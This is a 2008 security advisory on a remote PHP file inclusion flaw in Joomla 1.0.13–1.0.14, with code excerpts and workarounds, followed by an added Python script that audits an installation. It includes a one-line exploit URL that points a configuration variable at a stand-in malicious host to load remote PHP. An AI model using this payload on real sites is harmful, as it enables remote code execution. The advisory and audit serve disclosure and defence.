joomlaoldconfig-rfi.txt

Description

`Affects: Joomla 1.0.13 - 1.0.14
Vulnerability: (remote) PHP file inclusion possible if old configuration.php
Date: 14-feb-2008
Introduction:
Remote PHP file inclusion is possible when RG_EMULATION is not defined in
configuration.php. This is typical when upgrading from an older version,
leaving configuration.php untouched. Furthermore, in PHP, register_globals
must be 'off' for this exploit to work.
In Joomla >=1.0.13, configuration.php-dist disables register_globals
emulation by defining RG_EMULATION false. In older Joomla versions, this
was defined in globals.php instead.
Users upgrading without touching configuration.php (quite typical) will
have RG_EMULATION unset, resulting in the following vulnerability.
In Revision 7424 of globals.php, the 'configuration.php' file is included
before registerGlobals() is called, allowing a malicious peer to override
any value set in configuration.php.
Details:
Since revision 7424, globals.php includes 'configuration.php' if
RG_EMULATION is unset, and enables RG_EMULATION by default for 'old
configuration files':
    if( defined( 'RG_EMULATION' ) === false ) {
        if( file_exists( dirname(__FILE__).'/configuration.php' ) ) {
            require( dirname(__FILE__).'/configuration.php' );
        }
        if( defined( 'RG_EMULATION' ) === false ) {
            // The configuration file is old so default to on
            define( 'RG_EMULATION', 1 );
        }
    }
The registerGlobals function is called *after* having included
'configuration.php':
    } else if (ini_get('register_globals') == 0) {
        // php.ini has register_globals = off and emulate = on
        registerGlobals();
Maliciously set GET variables cause variables set by configuration.php
to be overwritten.
Looking in index.php:
    require( 'globals.php' );
    require_once( 'configuration.php' );
Since 'configuration.php' was already included by globals.php, the
require_once() won't include the configuration.php again (leaving
"attacker's" values untouched!).
The exploit:
http://joomlasite/index.php?mosConfig_absolute_path=http://malhost/php_script.txt
Workaround:
In index*.php and administrator/index*.php change:
    require_once( 'configuration.php' );
to
    require('configuration.php');
Or disable RG_EMULATION by using the line in configuration.php-dist in
configuration.php:
    if(!defined('RG_EMULATION')) { define( 'RG_EMULATION', 0 ); } // Off by default for security
Regards,
Hendrik-Jan Verheij
BWSS B.V.
`
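A way to check an installation against both workarounds above, as an added example that is not part of the original advisory or of Joomla's code. The function names `audit` and `rg_emulation_state` are hypothetical, the statement matching is regex-based rather than a PHP parser, and PHP's own register_globals setting is not inspected.

```python
import re
from pathlib import Path

# define('RG_EMULATION', <value>) as shipped in configuration.php-dist
DEFINE_RE = re.compile(
    r"""\bdefine\s*\(\s*['"]RG_EMULATION['"]\s*,\s*([^)]+?)\s*\)""", re.I)
# any require_once statement that names configuration.php (with or without a path)
REQUIRE_ONCE_RE = re.compile(
    r"""\brequire_once\b[^;]*?configuration\.php['"]""", re.I)
COMMENT_RE = re.compile(r"/\*.*?\*/|(?://|#)[^\n]*", re.S)


def strip_comments(php):
    # Naive: also cuts the rest of a line after '//' or '#' inside a string
    # literal, which is acceptable for spotting these two statements.
    return COMMENT_RE.sub("", php)


def rg_emulation_state(config_text):
    """Return 'off', 'on' or 'undefined' for the text of a configuration.php."""
    m = DEFINE_RE.search(strip_comments(config_text))
    if m is None:
        return "undefined"  # old file: globals.php then defaults RG_EMULATION to 1
    value = m.group(1).strip("'\" ").lower()
    return "off" if value in ("0", "false") else "on"


def audit(site_root):
    """Check one Joomla 1.0.x tree against both workarounds in the advisory."""
    root = Path(site_root)
    state = rg_emulation_state(
        (root / "configuration.php").read_text(errors="replace"))
    entry_points = sorted(set(root.glob("index*.php"))
                          | set(root.glob("administrator/index*.php")))
    # Entry points where require_once would leave overridden values in place
    unpatched = [p.relative_to(root).as_posix() for p in entry_points
                 if REQUIRE_ONCE_RE.search(
                     strip_comments(p.read_text(errors="replace")))]
    # Either workaround is enough, but the require change must cover every file.
    return {"rg_emulation": state, "require_once_in": unpatched,
            "exposed": state != "off" and bool(unpatched)}


if __name__ == "__main__":
    import sys
    print(audit(sys.argv[1]))
```

Run it with the site's document root as the only argument; an `exposed` value of `True` means neither workaround is fully applied.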
